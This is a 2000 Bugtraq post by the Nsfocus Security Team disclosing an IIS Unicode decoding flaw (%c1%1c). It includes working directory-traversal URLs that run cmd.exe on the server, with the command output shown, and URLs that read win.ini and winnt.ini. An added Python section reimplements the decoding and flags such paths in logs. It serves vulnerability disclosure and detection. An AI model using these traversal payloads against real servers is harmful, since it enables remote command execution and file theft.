[17249] in bugtraq
Re: IIS %c1%1c remote command execution
daemon@ATHENA.MIT.EDU (Nsfocus Security Team)
Wed Oct 18 09:48:42 2000
Mime-Version: 1.0
Content-Type: text/plain; charset="GB2312"
Message-ID: <200010180741.PAA09855@intra.nsfocus.com>
Date: Wed, 18 Oct 2000 15:35:31 +0800
Reply-To: Nsfocus Security Team <security@NSFOCUS.COM>
From: Nsfocus Security Team <security@NSFOCUS.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Content-Transfer-Encoding: 8bit
We found this bug several weeks ago.
When we were ready to report it to Microsoft, we found it had already been posted to BugTraq.
A member of our team disassembled the IIS 5.0 (Chinese version) Unicode decoding
implementation. He found a strange decoding method when IIS encounters "%c1%hh" and
"%c0%hh" (0x00 <= 0xhh < 0x40):
IIS will decode "%c1%hh" to (0xc1 - 0xc0) * 0x40 + 0xhh.
IIS will decode "%c0%hh" to (0xc0 - 0xc0) * 0x40 + 0xhh.
Example (Windows 2000 + IIS 5.0 + SP1, Simplified Chinese version):
http://192.168.8.48/A.ida/%c1%00.ida
IIS said "@.ida" can't be found
here: (0xc1 - 0xc0) * 0x40 + 0x00 = 0x40 = '@'
http://192.168.8.48/A.ida/%c1%01.ida
IIS said "A.ida" can't be found
here: (0xc1 - 0xc0) * 0x40 + 0x01 = 0x41 = 'A'
http://192.168.8.48/A.ida/%c1%02.ida
IIS said "B.ida" can't be found
....
http://192.168.8.48/A.ida/%c0%21.ida
IIS said "!.ida" can't be found
...
It means you can encode most characters with this feature.
For example:
%c1%1c -> (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/'
%c0%2f -> (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '\'
We guess that we can use it to bypass some directory restrictions:
(1)
http://192.168.8.48/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
Now we get:
Directory of d:\inetpub\scripts
2000-09-28 15:49 <DIR> .
2000-09-28 15:49 <DIR> ..
1999-07-21 17:49 147,456 Count.exe
2000-09-12 17:08 438,290 Count25.exe
2000-10-13 15:03 8,867 counter.err
2000-08-23 23:07 160,002 counter.exe
1999-05-25 18:14 3,925 CountNT.html
1999-07-21 17:49 64,512 extdgts.exe
2000-08-10 15:24 46,352 ism.dll
1999-07-21 17:49 64,512 mkstrip.exe
1999-05-25 18:18 1,317 README.txt
2000-09-28 15:49 <DIR> wcount
9 File(s) 935,233 bytes
(2) We can get the content of some system files with this bug too:
http://192.168.8.48/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini
IIS deems it to be a request for an .ASP file. It will call asp.dll to open
the file win.ini.
For IIS 4.0 + SP6 (Chinese), the URL above failed. It seems that IIS is getting
smarter. But we found it interesting that we can use this malformed URL
to trick IIS into returning winnt.ini:
http://192.168.8.100/default.asp/a.exe/..%c1%1c../..%c1%1c../winnt/winnt.ini
"default.asp" should be an existing .ASP file.
"a.exe" is a random .EXE file name; it can be a nonexistent file.
It looks like IIS 4.0/5.0 for the English version has a different decoding implementation.
---Original Message---
>Recently I received an email from Par Osterberg that directed my attention
>to a post in the Packetstorm forums:
>
>http://209.143.242.119/cgi-bin/cbmc/forums.cgi?authkey=anonymous&uname=anonymous&datopic=Windows&mesgcheck=defined&gum=474&editoron=
>
[...]
>
>- rain forest puppy
Regards,
Nsfocus Security Team <security@nsfocus.com>
http://www.nsfocus.com
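As an added example (not part of the original post, and not IIS's own code), the decoding rule described above in Python: the lenient (lead - 0xC0) * 0x40 + trail arithmetic next to a strict UTF-8 check that rejects such sequences, and a scanner that flags request paths carrying them so they can be spotted in web logs. The sample paths are constructed; the first two mirror the URLs in the post.

```python
# Added example (not from the original post): the lenient decoding the post
# describes beside a strict UTF-8 check, and a request-path scanner that
# flags the malformed %c0/%c1 sequences so they can be spotted in web logs.
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote_to_bytes

def lenient_decode_pair(lead: int, trail: int) -> int:
    """Decode as the post describes: (lead - 0xC0) * 0x40 + trail, i.e. the
    low 5 bits of lead and the low 6 bits of trail, with no check that
    trail is really a continuation byte."""
    return (lead - 0xC0) * 0x40 + trail

def strict_decode_pair(lead: int, trail: int) -> Optional[int]:
    """Decode a two-byte UTF-8 sequence only when well formed: lead in
    0xC2..0xDF (0xC0/0xC1 are always overlong) and trail in 0x80..0xBF."""
    if not (0xC2 <= lead <= 0xDF and 0x80 <= trail <= 0xBF):
        return None
    return ((lead & 0x1F) << 6) | (trail & 0x3F)

def find_malformed_sequences(path: str) -> List[Tuple[int, int, str]]:
    """Percent-decode a request path and report each two-byte lead
    (0xC0..0xDF) a strict decoder rejects, with the ASCII character the
    lenient decoder would produce ('?' if the result is not ASCII)."""
    raw = unquote_to_bytes(path)
    hits = []
    for lead, trail in zip(raw, raw[1:]):
        if 0xC0 <= lead <= 0xDF and strict_decode_pair(lead, trail) is None:
            cp = lenient_decode_pair(lead, trail)
            hits.append((lead, trail, chr(cp) if cp < 0x80 else "?"))
    return hits

def flag_paths(paths: List[str]) -> Dict[str, List[Tuple[int, int, str]]]:
    """Return only the paths that contain malformed sequences."""
    flagged = {}
    for p in paths:
        hits = find_malformed_sequences(p)
        if hits:
            flagged[p] = hits
    return flagged

# Constructed sample request paths; the first two mirror the post's URLs.
SAMPLE_PATHS = [
    "/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir",
    "/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini",
    "/index.asp?q=%c3%a9",  # well-formed UTF-8 for U+00E9, benign
    "/images/logo.gif",
]
```

Running flag_paths(SAMPLE_PATHS) reports only the first two paths, each with 0xC1 0x1C leniently decoding to a backslash.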